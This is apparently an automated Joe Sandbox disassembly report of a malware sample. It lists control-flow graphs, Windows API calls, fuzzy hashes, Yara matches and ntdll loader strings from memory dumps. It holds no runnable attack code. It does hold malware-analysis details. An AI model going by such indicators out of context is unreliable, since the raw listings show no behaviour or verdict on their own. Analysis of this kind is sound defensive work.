                                                            • Instruction ID: 2805ce5739546bf28ef350ca54bd94a1153e5ae1c88c77c206af936020e35fcb
                                                            • Opcode Fuzzy Hash: 94c412ed7b5636dd7f45e1d4539c1be915cf2a756b15b08eafd0a93d443b0ba7
                                                            • Instruction Fuzzy Hash: D190023120144423D21171598504707000987D0781F95C433A0464558E9A5A8A53B122
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 881a4548115e74ad18fd9c443eca6b208b17d7186afcea8ba606ddcad8ad9aca
                                                            • Instruction ID: 3a94c62ced44d4a3a77684c6d6c9775427a01b8979a48b7f5db9c99936fa5078
                                                            • Opcode Fuzzy Hash: 881a4548115e74ad18fd9c443eca6b208b17d7186afcea8ba606ddcad8ad9aca
                                                            • Instruction Fuzzy Hash: 4890023160554412D20071598514706100587D0741F65C432A0464568E8B998A5275A3

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 0 4145af-4145c9 1 4145cc-414607 0->1 2 414667-4146bd call 417e43 call 404993 call 425593 1->2 3 414609 1->3 20 4146dd-4146e3 2->20 21 4146bf-4146ce PostThreadMessageW 2->21 5 41460a-41460b 3->5 7 414637 5->7 8 41460d-41461f 5->8 7->5 10 414638-41463a 7->10 8->1 16 414621-414628 8->16 13 414644 10->13 14 41463c-414643 10->14 14->13 18 414635-414636 16->18 19 41462a-414633 16->19 18->7 19->18 21->20 22 4146d0-4146da 21->22 22->20
                                                            APIs
                                                            • PostThreadMessageW.USER32(t577G2K6,00000111,00000000,00000000), ref: 004146CA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1864882444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_400000_PGK60fNNCZ.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: MessagePostThread
                                                            • String ID: t577G2K6$t577G2K6
                                                            • API String ID: 1836367815-2667467881
                                                            • Opcode ID: 394e34f50c0a247bce552346e383af64fefe3a966aa8cb87820a7dc397317cf4
                                                            • Instruction ID: 29e5b59ae817b40a0492b9d9877405cfbecd047df74ef541c8353dda1529c221
                                                            • Opcode Fuzzy Hash: 394e34f50c0a247bce552346e383af64fefe3a966aa8cb87820a7dc397317cf4
                                                            • Instruction Fuzzy Hash: 7531C1729062947BCB01DB759C42CDEBBA8EE9339871840AEED449B201D13E8D438BD5

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 23 41464a-414685 call 42efb3 call 42f9c3 28 41468b-4146bd call 404993 call 425593 23->28 29 414686 call 417e43 23->29 34 4146dd-4146e3 28->34 35 4146bf-4146ce PostThreadMessageW 28->35 29->28 35->34 36 4146d0-4146da 35->36 36->34
                                                            APIs
                                                            • PostThreadMessageW.USER32(t577G2K6,00000111,00000000,00000000), ref: 004146CA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1864882444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_400000_PGK60fNNCZ.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: MessagePostThread
                                                            • String ID: t577G2K6$t577G2K6
                                                            • API String ID: 1836367815-2667467881
                                                            • Opcode ID: 225896aef3f5f2ded065938a9608066204f4b1233ee5aa046c5d70eacc74819f
                                                            • Instruction ID: 8fda3ae30d1e02e1b48dbe91bdc2a1754cabd6a2c39bac0a93a85bd1a5eab231
                                                            • Opcode Fuzzy Hash: 225896aef3f5f2ded065938a9608066204f4b1233ee5aa046c5d70eacc74819f
                                                            • Instruction Fuzzy Hash: DD1106B1D4021C7EDB119AE58C81DEFBB7CDF453A8F41407AFA54A7141E2784E068BA5

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 37 414653-414665 38 41466d-414685 call 42f9c3 37->38 39 414668 call 42efb3 37->39 42 41468b-4146bd call 404993 call 425593 38->42 43 414686 call 417e43 38->43 39->38 48 4146dd-4146e3 42->48 49 4146bf-4146ce PostThreadMessageW 42->49 43->42 49->48 50 4146d0-4146da 49->50 50->48
                                                            APIs
                                                            • PostThreadMessageW.USER32(t577G2K6,00000111,00000000,00000000), ref: 004146CA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1864882444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_400000_PGK60fNNCZ.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: MessagePostThread
                                                            • String ID: t577G2K6$t577G2K6
                                                            • API String ID: 1836367815-2667467881
                                                            • Opcode ID: 0353cb2e23396fec2c33eb35837a01185db1fbe0d8a77d78faa4aa4f93364115
                                                            • Instruction ID: fd813871938eb91e280231b459abbd0e5037b6e28a91437a499ad31076d5f8c8
                                                            • Opcode Fuzzy Hash: 0353cb2e23396fec2c33eb35837a01185db1fbe0d8a77d78faa4aa4f93364115
                                                            • Instruction Fuzzy Hash: 800104B1D0021C7ADB11AAE58C81DEFBB7CDF45398F408069FA44A7140E17C4E068BA5

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 231 417f0b-417f14 232 417ea6-417eb7 LdrLoadDll 231->232 233 417f16-417f1c 231->233 235 417eba-417ebd 232->235 234 417f1d 233->234 236 417f1e-417f2a 234->236 237 417f2c 236->237 238 417eec-417f00 237->238 239 417f2e-417f37 237->239 238->237 241 417f02-417f06 238->241 239->234 240 417f39-417f42 239->240 242 417f45-417fa1 240->242 243 417ecf-417ede 240->243 241->236 244 417f08 241->244 246 417ee0-417ee2 243->246 247 417eeb 243->247 244->234 247->238
                                                            APIs
                                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417EB5
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1864882444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_400000_PGK60fNNCZ.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Load
                                                            • String ID:
                                                            • API String ID: 2234796835-0
                                                            • Opcode ID: 3ecf082fedf959eed90aedf2510164954cb22344a25520f17983f10a877f4610
                                                            • Instruction ID: cee6ba3a713131cb16669297f14733702e208aa7074b7cb970d80753226a90f1
                                                            • Opcode Fuzzy Hash: 3ecf082fedf959eed90aedf2510164954cb22344a25520f17983f10a877f4610
                                                            • Instruction Fuzzy Hash: 7AF02D32E88209CFDB00DF98DC45BD9B3B0FB56719F140ADAEA188B241D36555968B49

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 248 42d143-42d184 call 404a23 call 42e053 RtlAllocateHeap
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(?,0041EC3E,?,?,00000000,?,0041EC3E,?,?,?), ref: 0042D17F
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1864882444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_400000_PGK60fNNCZ.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: 74368963601848dfb3932e514e7ed159cc0ff9022fa56ce1313e14f5d7574f60
                                                            • Instruction ID: 1a0320424f6e2513cda363ed32119c93a96c745f6f302d4d30482123bd46745d
                                                            • Opcode Fuzzy Hash: 74368963601848dfb3932e514e7ed159cc0ff9022fa56ce1313e14f5d7574f60
                                                            • Instruction Fuzzy Hash: F0E06D723042187BC614EE59DC41FDB73ACEFC9710F004419F908A7241CA75BA118BF8

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 253 42d193-42d1d7 call 404a23 call 42e053 RtlFreeHeap
                                                            APIs
                                                            • RtlFreeHeap.NTDLL(00000000,00000004,00000000,03D00305,00000007,00000000,00000004,00000000,004176B4,000000F4), ref: 0042D1D2
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1864882444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_400000_PGK60fNNCZ.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FreeHeap
                                                            • String ID:
                                                            • API String ID: 3298025750-0
                                                            • Opcode ID: 75f02b597de3cd126b2fc3062aff01064d508103aae48e6dc2a1c99785baf08f
                                                            • Instruction ID: e28c5f6046658d42be081c83e7545d2ad134910e97977f916db6725ae22c6c78
                                                            • Opcode Fuzzy Hash: 75f02b597de3cd126b2fc3062aff01064d508103aae48e6dc2a1c99785baf08f
                                                            • Instruction Fuzzy Hash: 19E092723002147BCA10EE5AEC41FEB73ACEFC9710F004019FD08A7241CA78B9118BB8

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 263 42d1e3-42d21f call 404a23 call 42e053 ExitProcess
                                                            APIs
                                                            • ExitProcess.KERNEL32(?,00000000,00000000,?,601A316F,?,?,601A316F), ref: 0042D21A
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1864882444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_400000_PGK60fNNCZ.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ExitProcess
                                                            • String ID:
                                                            • API String ID: 621844428-0
                                                            • Opcode ID: a25d0429e58c5588c2827f12b5b4e4ce589c6b7f4323042011048058824ffb56
                                                            • Instruction ID: fa5f5a3ee7dd61a2881b8e9e18f2c3305c63e6423d1f29c247da1a030937b839
                                                            • Opcode Fuzzy Hash: a25d0429e58c5588c2827f12b5b4e4ce589c6b7f4323042011048058824ffb56
                                                            • Instruction Fuzzy Hash: 5FE04F762402147BC510EB5ADC01F97775CEFC5755F508419FA0967142CB75BA11C7B4

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 268 fd2c0a-fd2c0f 269 fd2c1f-fd2c26 LdrInitializeThunk 268->269 270 fd2c11-fd2c18 268->270
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                            Strings
                                                            • Critical section address., xrefs: 01005502
                                                            • Critical section address, xrefs: 01005425, 010054BC, 01005534
                                                            • double initialized or corrupted critical section, xrefs: 01005508
                                                            • Address of the debug info found in the active list., xrefs: 010054AE, 010054FA
                                                            • Invalid debug info address of this critical section, xrefs: 010054B6
                                                            • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 010054E2
                                                            • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0100540A, 01005496, 01005519
                                                            • Thread is in a state in which it cannot own a critical section, xrefs: 01005543
                                                            • 8, xrefs: 010052E3
                                                            • corrupted critical section, xrefs: 010054C2
                                                            • Critical section debug info address, xrefs: 0100541F, 0100552E
                                                            • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 010054CE
                                                            • Thread identifier, xrefs: 0100553A
                                                            • undeleted critical section in freed memory, xrefs: 0100542B
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                            Strings
                                                            • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 010025EB
                                                            • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01002409
                                                            • RtlpResolveAssemblyStorageMapEntry, xrefs: 0100261F
                                                            • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01002506
                                                            • @, xrefs: 0100259B
                                                            • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01002602
                                                            • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 010022E4
                                                            • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01002624
                                                            • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01002412
                                                            • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01002498
                                                            • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 010024C0
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                            Strings
                                                            • VerifierFlags, xrefs: 01018C50
                                                            • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01018A3D
                                                            • AVRF: -*- final list of providers -*- , xrefs: 01018B8F
                                                            • VerifierDlls, xrefs: 01018CBD
                                                            • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01018A67
                                                            • VerifierDebug, xrefs: 01018CA5
                                                            • HandleTraces, xrefs: 01018C8F
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                            Strings
                                                            • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 00FE99ED
                                                            • apphelp.dll, xrefs: 00F86496
                                                            • Getting the shim engine exports failed with status 0x%08lx, xrefs: 00FE9A01
                                                            • LdrpInitShimEngine, xrefs: 00FE99F4, 00FE9A07, 00FE9A30
                                                            • minkernel\ntdll\ldrinit.c, xrefs: 00FE9A11, 00FE9A3A
                                                            • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 00FE9A2A
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                            Strings
                                                            • LdrpInitializeImportRedirection, xrefs: 01008177, 010081EB
                                                            • minkernel\ntdll\ldrinit.c, xrefs: 00FCC6C3
                                                            • Unable to build import redirection Table, Status = 0x%x, xrefs: 010081E5
                                                            • LdrpInitializeProcess, xrefs: 00FCC6C4
                                                            • Loading import redirection DLL: '%wZ', xrefs: 01008170
                                                            • minkernel\ntdll\ldrredirect.c, xrefs: 01008181, 010081F5
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                            Strings
                                                            • SXS: %s() passed the empty activation context, xrefs: 01002165
                                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 010021BF
                                                            • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0100219F
                                                            • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01002180
                                                            • RtlGetAssemblyStorageRoot, xrefs: 01002160, 0100219A, 010021BA
                                                            • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01002178
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                            APIs
                                                              • Part of subcall function 00FD2DF0: LdrInitializeThunk.NTDLL ref: 00FD2DFA
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FD0BA3
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FD0BB6
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FD0D60
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FD0D74
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                            • String ID:
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                            Strings
                                                            • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 00FC855E
                                                            • minkernel\ntdll\ldrinit.c, xrefs: 00FC8421
                                                            • LdrpInitializeProcess, xrefs: 00FC8422
                                                            • @, xrefs: 00FC8591
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Strings
                                                            • SXS: %s() passed the empty activation context, xrefs: 010021DE
                                                            • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 010021D9, 010022B1
                                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 010022B6
                                                            • .Local, xrefs: 00FC28D8
                                                            Strings
                                                            • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0100342A
                                                            • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01003437
                                                            • RtlDeactivateActivationContext, xrefs: 01003425, 01003432, 01003451
                                                            • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01003456
                                                            Strings
                                                            • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 00FF106B
                                                            • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 00FF10AE
                                                            • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 00FF1028
                                                            • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 00FF0FE5
                                                            Strings
                                                            • apphelp.dll, xrefs: 00FB2462
                                                            • minkernel\ntdll\ldrinit.c, xrefs: 00FFA9A2
                                                            • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 00FFA992
                                                            • LdrpDynamicShimModule, xrefs: 00FFA998
                                                            Strings
                                                            • HEAP[%wZ]: , xrefs: 00FA3255
                                                            • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 00FA327D
                                                            • HEAP: , xrefs: 00FA3264
                                                            Strings
                                                            • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                            Strings
                                                            • String ID: $@
                                                            Strings
                                                            • String ID: FilterFullPath$UseFilter$\??\
                                                            Strings
                                                            • minkernel\ntdll\ldrinit.c, xrefs: 00FFA121
                                                            • Failed to allocated memory for shimmed module list, xrefs: 00FFA10F
                                                            • LdrpCheckModule, xrefs: 00FFA117
                                                            Strings
                                                            • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                            Strings
                                                            • minkernel\ntdll\ldrinit.c, xrefs: 010082E8
                                                            • Failed to reallocate the system dirs string !, xrefs: 010082D7
                                                            • LdrpInitializePerUserWindowsDirectory, xrefs: 010082DE
                                                            Strings
                                                            • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0104C1C5
                                                            • @, xrefs: 0104C1F1
                                                            • PreferredUILanguages, xrefs: 0104C212
                                                            Strings
                                                            • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                            Strings
                                                            • LdrpCheckRedirection, xrefs: 0101488F
                                                            • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01014888
                                                            • minkernel\ntdll\ldrredirect.c, xrefs: 01014899
                                                            Strings
                                                            • LdrpInitializationFailure, xrefs: 010120FA
                                                            • minkernel\ntdll\ldrinit.c, xrefs: 01012104
                                                            • Process initialization failed with status 0x%08lx, xrefs: 010120F3
                                                            APIs
                                                            Strings
                                                            • API ID: ___swprintf_l
                                                            • String ID: #%u
                                                            Strings
                                                            • LdrResSearchResource Exit, xrefs: 00F9AA25
                                                            • LdrResSearchResource Enter, xrefs: 00F9AA13
                                                            Strings
                                                            • String ID: `$`
                                                            • API String ID: 0-197956300
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID: Legacy$UEFI
                                                            • API String ID: 2994545307-634100481
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @$MUI
                                                            • API String ID: 0-17815947
                                                            Strings
                                                            • kLsE, xrefs: 00F90540
                                                            • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 00F9063D
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                            • API String ID: 0-2547482624
                                                            Strings
                                                            • RtlpResUltimateFallbackInfo Exit, xrefs: 00F9A309
